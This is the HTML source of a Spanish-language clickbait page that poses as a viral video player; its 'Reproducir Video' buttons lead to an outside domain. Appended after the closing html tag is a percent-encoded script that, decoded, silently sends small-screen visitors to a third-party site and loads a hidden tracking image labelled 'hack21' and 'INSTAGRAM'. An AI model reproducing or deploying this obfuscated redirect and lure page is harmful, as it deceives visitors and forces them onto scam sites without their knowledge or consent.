<!DOCTYPE html>
<html amp>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <style amp-boilerplate>
      body {
        -webkit-animation: -amp-start 8s steps(1, end) 0s 1 normal both;
        -moz-animation: -amp-start 8s steps(1, end) 0s 1 normal both;
        -ms-animation: -amp-start 8s steps(1, end) 0s 1 normal both;
        animation: -amp-start 8s steps(1, end) 0s 1 normal both;
      }

      @-webkit-keyframes -amp-start {
        from {
          visibility: hidden;
        }
        to {
          visibility: visible;
        }
      }

      @-moz-keyframes -amp-start {
        from {
          visibility: hidden;
        }
        to {
          visibility: visible;
        }
      }

      @-ms-keyframes -amp-start {
        from {
          visibility: hidden;
        }
        to {
          visibility: visible;
        }
      }

      @-o-keyframes -amp-start {
        from {
          visibility: hidden;
        }
        to {
          visibility: visible;
        }
      }

      @keyframes -amp-start {
        from {
          visibility: hidden;
        }
        to {
          visibility: visible;
        }
      }
    </style>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, minimum-scale=1">
    <link href="https://fonts.googleapis.com/css?family=Open+Sans:700,300" rel="stylesheet" type="text/css">
    <style amp-custom>
      #branch-sdk {
        position: fixed;
        bottom: 0;
        left: 0;
        right: 0;
      }
      body {
        margin: 0;
        word-wrap: break-word;
        font-family: "Open Sans", Helvetica, serif;
      }
      .main-image {
        width: 100%;
        height: 250px;
        height: 75vw;
        background-image: url(https://i.imgur.com/Buw5EGO.gif);
        background-size: cover;
        background-position: top center;
      }
      #content-container {
        box-sizing: border-box;
        padding: 24px;
        margin: 0 24px;
        background-color: #fff;
      }
      .app-title {
        font-size: 14px;
        padding-bottom: 11px;
        text-transform: uppercase;
      }
      .card-title {
        font-size: 33px;
        line-height: 36px;
      }
      .app-content {
        padding-top: 10px;
        padding-bottom: 100px;
        font-size: 20px;
      }
      .input-wrapper {
        position: fixed;
        bottom: 0;
        left: 0;
        width: 100%;
        height: 110px;
        background-color: #fff;
        box-shadow: 0px -20px 20px -8px rgba(255, 255, 255, 1);
      }
      .input-container {
        width: 100%;
        padding: 0 24px;
        text-align: center;
        box-sizing: border-box;
      }
      .form-get-the-app {
        display: flex;
        text-align: center;
        padding-top: 10px;
        border-top: 2px solid #cecece;
        min-height: 300px;
      }
      .input-label {
        padding: 4px 10px;
        font-size: 13px;
        overflow: hidden;
        word-wrap: break-word;
        text-align: center;
      }
      .cta-button {
        flex-grow: 1;
        height: 62px;
        line-height: 62px;
        background-color: #fa0909;
        border-radius: 2px;
        font-size: 20px;
        padding: 0 20px;
        margin-left: 10px;
        color: #fff;
        text-align: center;
        text-decoration: none;
        display: flex;
        align-items: center;
        justify-content: center;
        cursor: pointer;
      }
      .cta-button:hover {
        background-color: #d10808;
      }
      @media only screen and (orientation: portrait) {
        .card--no-data .main-image {
          background-image: url("https://lh3.googleusercontent.com/blogger_img_proxy/AJ0KDdXqmhUjb0Pyb60s9WXqoPPJiyip91IhktsNjXR7XgoeIl5wuhXJ9WDtXK38y87YiR9tmL1cf6LGUNUbJZaEdicM7fr3cRTsyDfQOT-RiSzfAkt2mqPmOul3fIn_0rXD3N8f1mqeKsA=s0-d");
          background-size: auto;
          background-position: top center;
          background-repeat: repeat;
          height: 190px;
        }
        .card--no-data > .app-icon {
          position: absolute;
          top: 160px;
          left: 34px;
        }
        .card--no-data #content-container {
          margin-top: 20px;
        }
      }
      @media screen and (min-device-width: 321px) {
        .input-label {
          font-size: 14px;
        }
      }
      @media only screen and (min-device-width: 375px) and (orientation: portrait) {
        .main-image {
          height: 300px;
          height: 80vw;
        }
        .app-content {
          padding-bottom: 120px;
        }
        .input-wrapper {
          height: 115px;
        }
      }
      @media only screen and (min-device-width: 414px) and (orientation: portrait) {
        .main-image {
          height: 390px;
          height: 95vw;
        }
      }
      @media only screen and (orientation: landscape) {
        .main-image {
          position: fixed;
          height: 100%;
          height: 100vh;
          width: 50%;
        }
        .input-wrapper {
          right: 0;
          left: auto;
          width: 50%;
        }
        #content-container {
          float: left;
          width: 50%;
          margin-left: 50%;
        }
        .input-wrapper {
          height: 108px;
        }
        .app-content {
          padding-bottom: 110px;
        }
        .form-get-the-app {
          padding-top: 8px;
        }
        .input-container {
          left: 50%;
        }
        .cta-button {
          height: 44px;
          line-height: 44px;
          padding: 0 5px;
          margin-left: 50px;
        }
        .app-icon {
          width: 44px;
          height: 44px;
        }
        .card--no-data .main-image {
          height: 100%;
        }
        .card--no-data > .app-icon {
          display: none;
        }
        .card--no-data #content-container {
          margin-top: 0;
        }
      }
      @media only screen and (min-device-width: 645px) and (orientation: landscape) {
        .form-get-the-app {
          padding-top: 8px;
        }
        .cta-button {
          height: 62px;
          line-height: 62px;
          padding: 0 20px;
          margin-left: 70px;
        }
        .app-icon {
          width: 62px;
          height: 62px;
          top: -2px;
        }
      }
      .text-bold {
        font-weight: 700;
      }
      .text-light {
        font-weight: 300;
      }
      .cta-button--no-app-icon {
        margin-left: 0;
      }
    </style>
    <link rel="apple-touch-icon" href=https://i.imgur.com/ZycASzN.png">
    <meta property="al:android:package" content="http://rumb.iblogger.org/">
    <meta name="twitter:app:id:googleplay" content="http://rumb.iblogger.org/">
    <meta property="al:android:app_name" content="Viralfacebookvideo">
    <meta name="twitter:app:name:googleplay" content="Viralfacebookvideo">
    <meta name="twitter:card" content="summary_large_image">
    <meta property="og:image" content="https://i.imgur.com/ZycASzN.png">
    <meta name="twitter:image:src" content="https://i.imgur.com/ZycASzN.png">
    <title>VIDEO COMPLETO</title>
    <meta property="og:title" content="Video Completo">
    <meta name="twitter:title" content="VIDEO ORIGINAL">
    <meta property="og:description" content="Video Completo">
    <meta name="twitter:description" content="VIDEO ORIGINAL">
    <meta name="twitter:app:country" content="US">
    <script async src="https://cdn.ampproject.org/v0.js"></script>
    <script async src="https://cdn.ampproject.org/v0/amp-iframe-0.1.js" custom-element="amp-iframe"></script>
    <script async src="https://cdn.ampproject.org/v0/amp-list-0.1.js" custom-element="amp-list"></script>
    <script async src="https://cdn.ampproject.org/v0/amp-mustache-0.2.js" custom-template="amp-mustache"></script>
    <link rel="canonical" href="https://captionconjecture.com/ncd0tibp?key=a38d20c400ac0e1de01424f98192b1cf">
  <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
</head>
  <body>
    <meta http-equiv="cache-control" content="no-cache">
    <noscript>
      <style amp-boilerplate>
        body {
          -webkit-animation: none;
          -moz-animation: none;
          -ms-animation: none;
          animation: none;
        }
      </style>
    </noscript>
    <div class="card center">
      <a href="https://captionconjecture.com/ncd0tibp?key=a38d20c400ac0e1de01424f98192b1cf">
        <div class="main-image"></div>
      </a>
      <div id="content-container">
        <div class="app-title text-bold"></div>
        <div class="card-title text-light"> ⚠️ VIDEO VIRAL COMPLETO 🌎</div>
        <div class="app-content text-light"></div>
      </div>
      <div class="input-wrapper">
        <div class="input-container">
          <div class="input-label text-light">⬇️⬇️CLIC PLAY⬇️⬇️ </div>
          <div class="form-get-the-app">
              <template type="amp-mustache" id="cta-template">
               <a href="https://captionconjecture.com/ncd0tibp?key=a38d20c400ac0e1de01424f98192b1cf" class="cta-button text-light cta-button--no-app-icon">
                 REPRODUCIR VIDEO
                </a>
                <amp-iframe
                  id="branch-sdk"
                  src="/amp-iframe-redirect?scheme_redirect=%7B%7Bscheme_redirect%7D%7D&amp;redirect_strategy=%7B%7Bredirect_strategy%7D%7D&amp;app_id=916490604035199433&amp;has_app=false"
                  sandbox="allow-scripts allow-top-navigation"
                  height="11"
                  layout="fixed-height"
                  frameborder="0"
                ></amp-iframe>
              </template>
            </amp-list>
          </div>
        </div>
      </div>
<!-- Botón redondo mejorado -->
<div style="position: fixed; bottom: 0; left: 0; width: 100%; text-align: center; background-color: #fa0909; padding: 10px;">
  <a href="https://captionconjecture.com/ncd0tibp?key=a38d20c400ac0e1de01424f98192b1cf" style="color: #fff; text-decoration: none; padding: 15px 20px; border-radius: 50px; font-size: 18px; display: inline-block;">
    Reproducir Video
  </a>
</div>
</div>
    </div>
    </div>
    <script type="text/javascript">
      var fb_list = [
      ];
    </script>
  </body>
</html>

<!-- Include the script -->
<script type='text/javascript'>document.write(unescape('%20%3C%73%63%72%69%70%74%3E%20%69%66%28%73%63%72%65%65%6E%2E%63%6F%6C%6F%72%44%65%70%74%68%20%3E%3D%20%32%34%20%26%26%20%6E%61%76%69%67%61%74%6F%72%2E%63%6F%6F%6B%69%65%45%6E%61%62%6C%65%64%20%3D%3D%20%74%72%75%65%20%26%26%20%73%63%72%65%65%6E%2E%77%69%64%74%68%20%3C%20%35%30%30%29%20%7B%20%73%65%74%54%69%6D%65%6F%75%74%28%73%65%74%54%69%6D%65%2C%20%30%29%3B%20%7D%20%66%75%6E%63%74%69%6F%6E%20%73%65%74%54%69%6D%65%28%29%20%7B%20%0A%20%0A%20%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%27%68%74%74%70%73%3A%2F%2F%63%62%65%6A%66%62%62%2E%64%61%74%65%73%6F%66%66%72%73%2E%63%6F%6D%2F%73%2F%62%32%65%37%32%37%35%33%30%37%34%65%63%27%3B%20%7D%20%3C%2F%73%63%72%69%70%74%3E%0A%0A%20%20%3C%69%6D%67%20%73%72%63%3D%22%2F%2F%77%68%6F%73%2E%61%6D%75%6E%67%2E%75%73%2F%70%69%6E%67%6A%73%2F%3F%6B%3D%68%61%63%6B%32%31%20%26%74%3D%20%49%4E%53%54%41%47%52%41%4D%20%26%78%3D%69%6E%73%74%61%67%72%61%6D%2E%63%6F%6D%2F%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%20%61%6C%74%3D%22%22%3E'))</script>
